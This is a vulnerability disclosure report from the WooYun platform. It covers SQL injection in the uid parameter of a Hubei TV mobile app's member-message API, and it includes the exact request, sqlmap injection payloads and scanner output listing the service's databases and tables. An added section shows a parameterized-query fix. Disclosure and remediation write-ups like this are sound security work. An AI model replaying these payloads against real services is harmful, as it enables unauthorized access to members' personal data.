
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-090771

Title: SQL injection in an official Hubei TV application could leak a large amount of member information

Vendor: Hubei TV (湖北电视台)

Author: kydhzy

Submitted: 2015-01-09 12:37

Fixed: 2015-02-23 12:38

Published: 2015-02-23 12:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-01-09: Details sent to the vendor, awaiting vendor handling
2015-01-14: Vendor confirmed; details disclosed to the vendor only
2015-01-24: Details disclosed to core white hats and relevant domain experts
2015-02-03: Details disclosed to regular white hats
2015-02-13: Details disclosed to intern white hats
2015-02-23: Details disclosed to the public

Brief description:

I watch TV every evening; if it's on TV, WooYun certainly has to have it.

Detailed description:

Screenshots first (images 4.jpg, 3.jpg, 2.jpg and 1.jpg not included here).

The official Hubei Jingshi (湖北经视) application, the 经视摇摇乐 mobile app, was found to be vulnerable to SQL injection. The injectable request:

GET /mobile/memberMsg/getMsg?uid=108514 HTTP/1.1
Host: mylive.moyuntv.com
Proxy-Connection: keep-alive
Referer: http://mylive.moyuntv.com/html/wap/userMsg.html
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; I318_T3 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: SERVERID=22115a7fc2c2cdf4460032a2809aff4a|1420720839|1420720839


Proof of vulnerability:

This request is injectable; the scanner output follows:
Place: GET
Parameter: uid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: uid=108514 AND 8100=8100
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=108514 AND (SELECT 2922 FROM(SELECT COUNT(*),CONCAT(0x3a646a673a,(SELECT (CASE WHEN (2922=2922) THEN 1 ELSE 0 END)),0x3a726a723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: uid=108514; SELECT SLEEP(5);--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: uid=108514 AND SLEEP(5)
---
[20:54:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5.0
[20:54:14] [INFO] fetching current user
[20:54:14] [INFO] retrieved: operlive@%
current user: 'operlive@%'
[20:54:14] [INFO] fetching database names
[20:54:15] [INFO] the SQL query used returns 7 entries
[20:54:15] [INFO] retrieved: information_schema
[20:54:15] [INFO] retrieved: hm_live
[20:54:15] [INFO] retrieved: hm_live_perinstall
[20:54:15] [INFO] retrieved: my_ad
[20:54:15] [INFO] retrieved: my_score
[20:54:15] [INFO] retrieved: mysql
[20:54:15] [INFO] retrieved: performance_schema
available databases [7]:
[*] hm_live
[*] hm_live_perinstall
[*] information_schema
[*] my_ad
[*] my_score
[*] mysql
[*] performance_schema
The hm_live_perinstall database alone has 134 tables; as for the other databases, I leave them to you.
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y
[22:02:52] [INFO] the SQL query used returns 134 entries
[22:02:52] [INFO] retrieved: hm_aca
[22:02:52] [INFO] retrieved: hm_activity
[22:02:52] [INFO] retrieved: hm_activity_apply
[22:02:52] [INFO] retrieved: hm_annunciate
[22:02:52] [INFO] retrieved: hm_app_recommend
[22:02:52] [INFO] retrieved: hm_app_recommend_stat
[22:02:53] [INFO] retrieved: hm_baoliao
[22:02:53] [INFO] retrieved: hm_c_activity
[22:02:53] [INFO] retrieved: hm_c_article
[22:02:53] [INFO] retrieved: hm_c_ecommerce
[22:02:53] [INFO] retrieved: hm_c_guess
[22:02:53] [INFO] retrieved: hm_c_link
[22:02:53] [INFO] retrieved: hm_c_localshop
[22:02:53] [INFO] retrieved: hm_c_pic
[22:02:53] [INFO] retrieved: hm_c_prize
[22:02:54] [INFO] retrieved: hm_c_q_answer
[22:02:54] [INFO] retrieved: hm_c_special
[22:02:54] [INFO] retrieved: hm_c_video
[22:02:54] [INFO] retrieved: hm_c_vote
[22:02:54] [INFO] retrieved: hm_card_type
[22:02:54] [INFO] retrieved: hm_cash_action
[22:02:54] [INFO] retrieved: hm_cash_log
[22:02:54] [INFO] retrieved: hm_cash_withdraw
[22:02:55] [INFO] retrieved: hm_catalog
[22:02:55] [INFO] retrieved: hm_catalog_purview
[22:02:55] [INFO] retrieved: hm_channel
[22:02:55] [INFO] retrieved: hm_channel_control
[22:02:55] [INFO] retrieved: hm_channel_prize
[22:02:55] [INFO] retrieved: hm_channel_program
[22:02:56] [INFO] retrieved: hm_channel_purview
[22:02:56] [INFO] retrieved: hm_channel_schedule
[22:02:56] [INFO] retrieved: hm_channel_type
[22:02:56] [INFO] retrieved: hm_com_app
[22:02:56] [INFO] retrieved: hm_com_app_version
[22:02:56] [INFO] retrieved: hm_com_apply
[22:02:56] [INFO] retrieved: hm_com_config
[22:02:56] [INFO] retrieved: hm_com_feedback
[22:02:57] [INFO] retrieved: hm_com_game
[22:02:57] [INFO] retrieved: hm_com_user
[22:02:57] [INFO] retrieved: hm_comment
[22:02:57] [INFO] retrieved: hm_company
[22:02:57] [INFO] retrieved: hm_config
[22:02:57] [INFO] retrieved: hm_config_copy
[22:02:57] [INFO] retrieved: hm_content
[22:02:57] [INFO] retrieved: hm_content_log
[22:02:57] [INFO] retrieved: hm_content_model
[22:02:58] [INFO] retrieved: hm_content_stat
[22:02:58] [INFO] retrieved: hm_content_status
[22:02:58] [INFO] retrieved: hm_coupons
[22:02:58] [INFO] retrieved: hm_dnamedia
[22:02:58] [INFO] retrieved: hm_ecommerce
[22:02:58] [INFO] retrieved: hm_egoods
[22:02:58] [INFO] retrieved: hm_form_option
[22:02:58] [INFO] retrieved: hm_form_type
[22:02:58] [INFO] retrieved: hm_game
[22:02:59] [INFO] retrieved: hm_game_copy
[22:02:59] [INFO] retrieved: hm_group
[22:02:59] [INFO] retrieved: hm_guess_log
[22:02:59] [INFO] retrieved: hm_guess_object
[22:02:59] [INFO] retrieved: hm_guess_option
[22:02:59] [INFO] retrieved: hm_info_content
[22:03:00] [INFO] retrieved: hm_info_type
[22:03:00] [INFO] retrieved: hm_interact
[22:03:00] [INFO] retrieved: hm_local_goods
[22:03:00] [INFO] retrieved: hm_login_log
[22:03:00] [INFO] retrieved: hm_lottery
[22:03:00] [INFO] retrieved: hm_lottery_code
[22:03:00] [INFO] retrieved: hm_lottery_log
[22:03:00] [INFO] retrieved: hm_lottery_type
[22:03:01] [INFO] retrieved: hm_manual_control_log
[22:03:01] [INFO] retrieved: hm_member
[22:03:01] [INFO] retrieved: hm_member_data
[22:03:01] [INFO] retrieved: hm_member_detail
[22:03:01] [INFO] retrieved: hm_member_findpwd
[22:03:01] [INFO] retrieved: hm_member_group
[22:03:01] [INFO] retrieved: hm_member_login_log
[22:03:01] [INFO] retrieved: hm_member_msg
[22:03:01] [INFO] retrieved: hm_member_score
[22:03:02] [INFO] retrieved: hm_member_thirdaccount
[22:03:02] [INFO] retrieved: hm_member_vest
[22:03:02] [INFO] retrieved: hm_menu
[22:03:02] [INFO] retrieved: hm_menu_copy
[22:03:02] [INFO] retrieved: hm_merchant_home
[22:03:02] [INFO] retrieved: hm_message
[22:03:02] [INFO] retrieved: hm_news_recommend
[22:03:02] [INFO] retrieved: hm_oplog
[22:03:03] [INFO] retrieved: hm_order
[22:03:03] [INFO] retrieved: hm_pay_callback_log
[22:03:03] [INFO] retrieved: hm_pic
[22:03:03] [INFO] retrieved: hm_plug_part
[22:03:03] [INFO] retrieved: hm_prize
[22:03:03] [INFO] retrieved: hm_prize_catalog
[22:03:04] [INFO] retrieved: hm_prize_exchange
[22:03:04] [INFO] retrieved: hm_prize_show_log
[22:03:04] [INFO] retrieved: hm_prize_type
[22:03:04] [INFO] retrieved: hm_prized_log
[22:03:04] [INFO] retrieved: hm_qa_log
[22:03:04] [INFO] retrieved: hm_qa_option
[22:03:04] [INFO] retrieved: hm_rank_user_num
[22:03:04] [INFO] retrieved: hm_recommend_home
[22:03:04] [INFO] retrieved: hm_recommend_type
[22:03:05] [INFO] retrieved: hm_report
[22:03:05] [INFO] retrieved: hm_role
[22:03:05] [INFO] retrieved: hm_role_aca
[22:03:05] [INFO] retrieved: hm_score_activity
[22:03:05] [INFO] retrieved: hm_score_log
[22:03:05] [INFO] retrieved: hm_score_rule
[22:03:05] [INFO] retrieved: hm_sensitive_word
[22:03:05] [INFO] retrieved: hm_sensitive_word_type
[22:03:06] [INFO] retrieved: hm_share_score_log
[22:03:06] [INFO] retrieved: hm_shop_seckill
[22:03:06] [INFO] retrieved: hm_shop_voucher_log
[22:03:06] [INFO] retrieved: hm_signin
[22:03:06] [INFO] retrieved: hm_site_share
[22:03:06] [INFO] retrieved: hm_sms
[22:03:06] [INFO] retrieved: hm_spchoujiang
[22:03:06] [INFO] retrieved: hm_spcomment
[22:03:06] [INFO] retrieved: hm_task
[22:03:07] [INFO] retrieved: hm_task_condition
[22:03:07] [INFO] retrieved: hm_task_log
[22:03:07] [INFO] retrieved: hm_task_prize_rand_log
[22:03:07] [INFO] retrieved: hm_task_restrictions_type
[22:03:07] [INFO] retrieved: hm_task_type
[22:03:07] [INFO] retrieved: hm_temp_lotterywin
[22:03:08] [INFO] retrieved: hm_terminal_info
[22:03:08] [INFO] retrieved: hm_topic__bak
[22:03:08] [INFO] retrieved: hm_unique_score
[22:03:08] [INFO] retrieved: hm_user_oplog
[22:03:08] [INFO] retrieved: hm_validate
[22:03:08] [INFO] retrieved: hm_video
[22:03:08] [INFO] retrieved: hm_vms_catalog_purview
[22:03:08] [INFO] retrieved: hm_vote_detail
[22:03:09] [INFO] retrieved: hm_vote_option
[22:03:09] [INFO] retrieved: hm_vote_stat
I did not go any further.

Fix recommendation:

You know what to do.
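The fix the author leaves implied is that the uid query-string value reaches the SQL text unparameterized. The following is an added example, not code from the report or from the vendor's application: it shows that vulnerable pattern beside its hardened form, using an in-memory sqlite3 table as a stand-in for the MySQL backend and the report's own boolean-based payloads as input. The table name, column names and row contents are assumptions constructed for the example.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for a member-message table behind
    # /mobile/memberMsg/getMsg. The real backend is MySQL; sqlite3 is used
    # only so the example runs offline. Table and column names are assumed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member_msg (id INTEGER, uid INTEGER, msg TEXT)")
    db.executemany(
        "INSERT INTO member_msg VALUES (?, ?, ?)",
        [(1, 108514, "hello"), (2, 108514, "world"), (3, 200, "other")],
    )
    return db


def get_msg_vulnerable(db, uid):
    # The pattern the scanner detected: the raw query-string value is spliced
    # into the SQL text, so "108514 AND 8100=8100" and "108514 AND 8100=8101"
    # return different row sets. That true/false difference is the
    # boolean-based blind channel through which the member data was read.
    sql = "SELECT msg FROM member_msg WHERE uid = " + uid
    return [row[0] for row in db.execute(sql)]


def get_msg_fixed(db, uid):
    # Hardened form: validate the type first (uid is a decimal integer id),
    # then bind it as a parameter so the value can never change the query.
    if not isinstance(uid, str) or not uid.isdigit():
        raise ValueError("uid must be a decimal integer")
    rows = db.execute("SELECT msg FROM member_msg WHERE uid = ?", (int(uid),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(get_msg_vulnerable(db, "108514 AND 8100=8100"))  # ['hello', 'world']
    print(get_msg_vulnerable(db, "108514 AND 8100=8101"))  # []
    print(get_msg_fixed(db, "108514"))                      # ['hello', 'world']
```

The same validate-then-bind approach applies to the PHP/MySQL backend the scanner fingerprinted: cast uid to an integer and pass it as a bound parameter of a prepared statement rather than interpolating it into the query string.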

Copyright notice: please credit the source when reposting: kydhzy@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-01-14 11:15

Vendor reply:

Latest status:

None yet